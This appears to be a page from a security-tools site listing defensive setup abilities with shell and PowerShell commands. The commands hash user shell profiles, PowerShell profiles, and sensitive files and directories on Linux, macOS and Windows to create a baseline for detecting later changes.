[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/home/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  hash=$(sha256sum $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/Users/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /var/root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  hash=$(shasum -a 256 $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}]
setup ["windows"] x · x ↗
Hash Powershell Profiles
This ability creates file hashes of Powershell profiles, creating the profiles themselves if they do not exist.
Show command 
[{"platform": "windows", "executor": "psh", "command": "$files = @(\"$Profile\", \"$PsHome\\Profile.ps1\", \"$PsHome\\Microsoft.Powershell_profile.ps1\");\n$output = @();\nForEach ($file in $files) {\n  if (-not (Test-Path $file)) {\n    New-Item -Path $file -ItemType File | Out-Null;\n  };\n  $output += $(Get-FileHash $file -EA silentlycontinue | foreach-object {$_.Path + '>' + $_.Hash});\n};\n$output\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Hash Sensitive Directories
Acquire hashes of compressed sensitive directories as a baseline to check if they are changed in the future
Show command 
[{"platform": "linux", "executor": "sh", "command": "output=\"\";\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  tar -czf /tmp/dir_sens_comp -C $directory .;\n  hash=$(sha256sum /tmp/dir_sens_comp | cut -d' ' -f1);\n  output=\"${output}${directory}>${hash}\\n\";\n  rm -f /tmp/dir_sens_comp;\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "output=\"\";\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  tar -cf - -C $directory . | gzip --no-name > /tmp/dir_sens_comp;\n  hash=$(shasum -a 256 /tmp/dir_sens_comp | cut -d' ' -f1);\n  output=\"${output}${directory}>${hash}\\n\";\n  rm -f /tmp/dir_sens_comp;\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "$output = '';\nGet-Item #{directory.sensitive.path} -EA silentlycontinue | Where-Object { $_ -is [System.IO.DirectoryInfo] } | foreach-object {\n  if ((Get-ChildItem $_.FullName -Force | Measure-Object).count -eq 0) {\n    echo '' > $($_.FullName + \"\\.bak\");\n  };\n  Compress-Archive -Force -Path $($_.FullName + \"\\*\") -DestinationPath $(\"C:\\Users\\Public\\dir_sens_comp.zip\");\n  $hash = (Get-FileHash C:\\Users\\Public\\dir_sens_comp.zip).Hash;\n  Remove-Item -Force C:\\Users\\Public\\dir_sens_comp.zip;\n  $output = \"$($output)$($_.FullName)>$($hash)`n\";\n};\n$output;\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Hash Sensitive Files
Acquire hashes of sensitive files as a baseline to check if they are changed in the future
Show command 
[{"platform": "linux", "executor": "sh", "command": "output=\"\";\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\nfor file in $files;\n  do hash=$(sha256sum $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "output=\"\";\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\nfor file in $files;\n  do hash=$(shasum -a 256 $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "Get-FileHash #{file.sensitive.path} -EA silentlycontinue | foreach-object {$_.Path + '>' + $_.Hash}\n"}]
Showing 151-200 of 211
Prev 4 Next
SOC and Response
CVE triage
Stack monitoring
Am I affected
IOC triage
KEV catalog
Recently exploited
Daily brief
Change tracking
Detection Engineering
Coverage workspace
Detection coverage
Coverage check
Telemetry ceiling
SIEM query builder
Sigma rules
SIEM rules
YARA rules
Network rules
D3FEND
Threat Hunting
Threat actors
ATT&CK techniques
Attack paths
Indicators
Atomic tests
Red Team and Pentest
Exploitability triage
Recon pack
Attack paths
CAPEC patterns
Adversary emulation
Compliance and GRC
Framework mapping
Control assessment
Audit view
Atlas Search Threat actors Techniques Tools & malware CWE CAPEC KEV catalog Package vulns
About All capabilities Pricing API docs Privacy policy Terms of service
threatengine.sh